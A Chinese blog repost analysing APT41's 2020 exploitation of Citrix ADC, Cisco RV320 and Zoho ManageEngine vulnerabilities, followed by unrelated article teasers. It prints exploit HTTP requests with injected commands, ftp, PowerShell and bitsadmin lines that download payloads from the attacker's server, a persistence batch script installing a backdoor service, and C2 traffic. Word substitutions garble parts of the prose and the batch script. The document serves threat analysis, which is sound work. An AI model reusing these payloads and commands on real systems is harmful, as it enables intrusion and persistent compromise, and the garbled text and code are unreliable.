如何进行APT41多漏洞网络攻击的分析

亿速云 • 2022年9月15日下午11:28 • 其他 • 阅读 576

漏洞利用

CVE-2019-19781 (Citrix Application Delivery Controller [ADC])

2020年1月20日开始，APT41使用IP地址66.42.98 [.] 220尝试利用漏洞CVE-2019-19781（于2019年12月17日发布）。

时间线：

最初利用CVE-2019-19781攻击发生在2020年1月20日和2020年1月21日，攻击活动中会执行命令‘file /bin/pwd’。首先将确认系统是否存在漏洞，有没有部署相关漏洞缓解措施。其次返回目标体系结构相关信息，为APT41后续部署后门提供信息。

所有观察到的请求仅针对Citrix设备执行，APT41利用已知设备列表进行操作。

HTTP POST示例：

POST /vpns/portal/scripts/newbm.pl HTTP/1.1
Host: [redacted]
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
NSC_NONCE: nsroot
NSC_USER: ../../../netscaler/portal/templates/[redacted]
Content-Length: 96

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]

1月23日至2月1日之间APT41活动暂停，从2月1日开始APT41开始使用CVE-2019-19781漏洞，这些载荷通过FTP下载。 APT41执行命令’/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]@66.42.98[.]220/bsd’，连接到66.42.98 [.] 220，使用用户名“ test”和密码登录到FTP服务器，然后下载“ bsd”有效负载（可能是后门）。

HTTP POST示例：

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1Accept-Encoding: identityContent-Length: 147Connection: closeNsc_User: ../../../netscaler/portal/templates/[redacted]User-Agent: Python-urllib/2.7Nsc_Nonce: nsrootHost: [redacted]Content-Type: application/x-www-form-urlencodedurl=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]@66.42.98[.]220/bsd`') %]

2月24日和2月25日CVE-2019-19781的利用次数显着增加，仅载荷名发生了变化。

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1Accept-Encoding: identityContent-Length: 145Connection: closeNsc_User: ../../../netscaler/portal/templates/[redacted]User-Agent: Python-urllib/2.7Nsc_Nonce: nsrootHost: [redacted]Content-Type: application/x-www-form-urlencodedurl=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]@66.42.98[.]220/un`') %]

Cisco Router

2020年2月21日APT41成功攻击了一家电信组织的Cisco RV320路由器，并下载了为名为“ fuc”（MD5：155e98e5ca8d662fad7dc84187340cbc）的64位MIPS有效负载。Metasploit模块结合了两个CVE（CVE-2019-1653和CVE-2019-1652）在Cisco RV320和RV325小型企业路由器上实现远程代码执行，并使用wget下载有效负载。

66.42.98 [.] 220还托管了文件http://66.42.98[.] 220/test/1.txt(MD5：c0c467c8e9b2046d7053642cc9bdd57d)的内容为“ cat/etc/flash/etc/nk_sysconfig”，该命令可在Cisco RV320路由器上执行显示当前配置。

Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability

Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability

CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)

3月5日研究人员发布了CVE-2020-10189验证代码。从3月8日开始APT41使用91.208.184 [.] 78来试图利用Zoho ManageEngine漏洞，有效负载（install.bat和storesyncsvc.dll）有两个不同的变化。在名列前茅个变体中，使用CVE-2020-10189漏洞直接上传“ logger.zip”，其中包含一组命令可使用PowerShell下载并执行install.bat和storesyncsvc.dll。

java/lang/Runtime
getRuntime
()Ljava/lang/Runtime;
Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:
WindowsTempinstall.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','
C:WindowsTempstoresyncsvc.dll')&C:WindowsTempinstall.bat
'(Ljava/lang/String;)Ljava/lang/Process;
StackMapTable
ysoserial/Pwner76328858520609
Lysoserial/Pwner76328858520609;

在第二个版本中APT41利用Microsoft BITSAdmin工具从66.42.98 [.] 220端口12345下载install.bat（MD5：7966c2c546b71e800397a67f942858d0）。

Parent Process: C:ManageEngineDesk较好Central_Serverjrebinjava.exeProcess Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:UsersPublicinstall.bat

两种变体都使用install.bat批处理文件来安装名为storesyncsvc.dll（MD5：5909983db4d9023e4098e56361c96a6f）。

install.bat内容：

@echo offset "WORK_DIR=C:WindowsSystem32"set "DLL_NAME=storesyncsvc.dll"set "SERVICE_NAME=StorSyncSvc"set "DISPLAY_NAME=Storage Sync Service"set "DESCRIPTION=The Storage Sync Service is the 较好-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is s较好ped or disabled, applications will be unable to run collectly." sc s较好 %SERVICE_NAME%sc delete %SERVICE_NAME%mkdir %WORK_DIR%copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Yreg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionSvchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /fsc create "%SERVICE_NAME%" binPath= "%SystemRoot%system32svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000sc description "%SERVICE_NAME%" "%DESCRIPTION%"reg add "HKLMSYSTEMCurrentControlSetServices%SERVICE_NAME%Parameters" /freg add "HKLMSYSTEMCurrentControlSetServices%SERVICE_NAME%Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%%DLL_NAME%" /fnet start "%SERVICE_NAME%"

与c2服务通联：

GET /jquery-3.3.1.min.js HTTP/1.1Host: cdn.bootcss.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://cdn.bootcss.com/Accept-Encoding: gzip, deflateCookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYMDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLIUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-Alive Cache-Control: no-cache

在攻击利用几个小时内，APT41使用storecyncsvc.dll BEACON后门下载了具有不同C2地址的辅助后门，然后下载2.exe（MD5：3e856162c36b532925c8226b4ed3481c）。2.exe是VMProtected Meterpreter下载器，用于下载Cobalt Strike BEACON shellcode。该组利用多次入侵来延迟对其其他工具的分析。

APT41这次活动中的扫描和攻击体现了其漏洞利用速度越来越快，目标信息搜集范围逐步扩大。此前美国防部确认，APT41成功利用CVE-2019-3396（Atlassian Confluence）攻击美国一所大学。可见APT41在从事间谍活动同时也在进行以经济利益为动机的网络活动。

以上就是如何进行APT41多漏洞网络攻击的分析，小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道

文章标题：如何进行APT41多漏洞网络攻击的分析，发布者：亿速云，转载请注明出处：https://worktile.com/kb/p/25540

apt 分析如何漏洞网络攻击亿速云

打赏

微信扫一扫

支付宝扫一扫

亿速云认证作者

0 0

CSS BFC是什么及有什么作用

上一篇 2022年9月15日下午11:27

windows 0xc00000f4蓝屏如何解决

下一篇 2022年9月15日下午11:28

其他

word怎么制作目录页

word制作目录的方法： 1、首先将光标放到文档标题下方，然后选择菜单栏依次点击“引用-目录-插入目录”。 2、然后根据情况选择显示级别点击确定，级别的选择只要大于自己需需求都可以。 3、此时如果将光标放置到目录下方，选择“插入-分页”可以使目录和正文分成两页。 4、如果文章的内容发生了更改，会导致…

亿速云
2022年9月19日
732000
其他

SQL中的开窗函数是什么

OVER的定义 OVER用于为行定义一个窗口，它对一组值进行操作，不需要使用GROUP BY子句对数据进行分组，能够在同一行中同时返回基础行的列和聚合列。 OVER的语法 OVER ( [ PARTITION BY column ] [ ORDER BY culumn ] ) PARTITION B…

亿速云
2022年9月2日
1.1K000
其他

daisyUI怎么解决TailwindCSS堆砌class问题

daisyUI概述 daisyUI是一个可定制的TailwindCSS的组件库，目前（发文日期）在GitHub中已经有12.8k的star数量。它与现在常用的ElementUI或者AntDesign不同，它提供了一些类名，类似于Bootstrap，想要拿来即用的组件需要自己进行封装。 daisyU…

亿速云
2022年8月30日
1.3K000
其他

ae预合成快捷键是什么

ae预合成快捷键：答：ae预合成快捷键为：ctrl+shift+c。当用户需要将两个素菜合成一个的时候，需要选这两个，然后直接合成。 ae预合成快捷键操作方法： 1、首先使用快捷键“ctrl+左键”来选择你要合成的素材，然后右击选“预合成”。 2、进入合成界面之后，可以为其创建一个名称。 3、搞…

亿速云
2022年8月29日
3.2K000
其他

windows浩辰cad看图王怎么使用

浩辰cad看图王使用方法： 1、首先我们下载安装这款软件 2、下载安装完成后，双击软件图标来打开它。 3、点击左上角的软件图标，选择“打开” 4、然后在其中找到并选中想要打开的图纸，点击“打开” 5、这样我们就可以在其中查看或编辑图纸了。 6、软件拥有编辑模式和览图模式两种，用户可以根据自己的需求来…

亿速云
2022年9月20日
800000
其他

怎么用vue实现动态路由

1、什么是动态路由？动态路由，动态即不是写死的，是可变的。我们可以根据自己不同的需求加载不同的路由，做到不同的实现及页面的渲染。动态的路由存储可分为两种，一种是将路由存储到前端。另一种则是将路由存储到数据库。动态路由的使用一般结合角色权限控制一起使用。总结： 1）路由可变，不是写死的，动态加载 …

亿速云
2022年9月15日
887000
其他

Redis集群操作的方法

基于已有一定基础，这里搭建一个基础版本三主三从，架构如下 1、启动集群 /usr/local/redis‐5.0.3/src/redis‐server /usr/local/redis‐cluster/8001/redis.conf /usr/local/redis‐5.0.3/src/redis‐…

亿速云
2022年9月21日
705000
其他

Java多态的概念和特点是什么

一、多态的概念继承关系使一个子类能继承父类的特征，并且附加一些新特征。子类是它的父类的特殊化，每个子类的实例都是其父类的实例，但是反过来不成立。例如：每个圆都是一个几何对象，但并非每个几何对象都是圆。因此，总可以将子类的实例传给需要父类型的参数。参考案例如下： public class Polym…

亿速云
2022年9月1日
447000
其他

Redis之Jedis如何使用

1.Jedis的介绍 Jedis = Java + Redis Redis不仅可以使用命令来操作，现在基本上主流的语言都有API支持，比如Java、C#、C++、PHP、Node.js、Go等。在官方网站里列一些Java的客户端，有Jedis、Redisson、Jredis、JDBC-Redis等其…

亿速云
2022年9月16日
556000
其他

windows驱动程序无法使用如何解决

解决方法：方法一： 1、首先确认之前是否存在这个问题。 2、如果该设备之前运行是正常的，突然出现驱动程序无法使用。 3、那么可以尝试右键开始菜单，进入“设备管理器” 4、然后在其中双击存在问题的设备。 5、最后在驱动程序下选择“回退驱动程序”即可。方法二： 1、如果该设备是首次使用，就出现驱动程…

亿速云
2022年9月21日
787000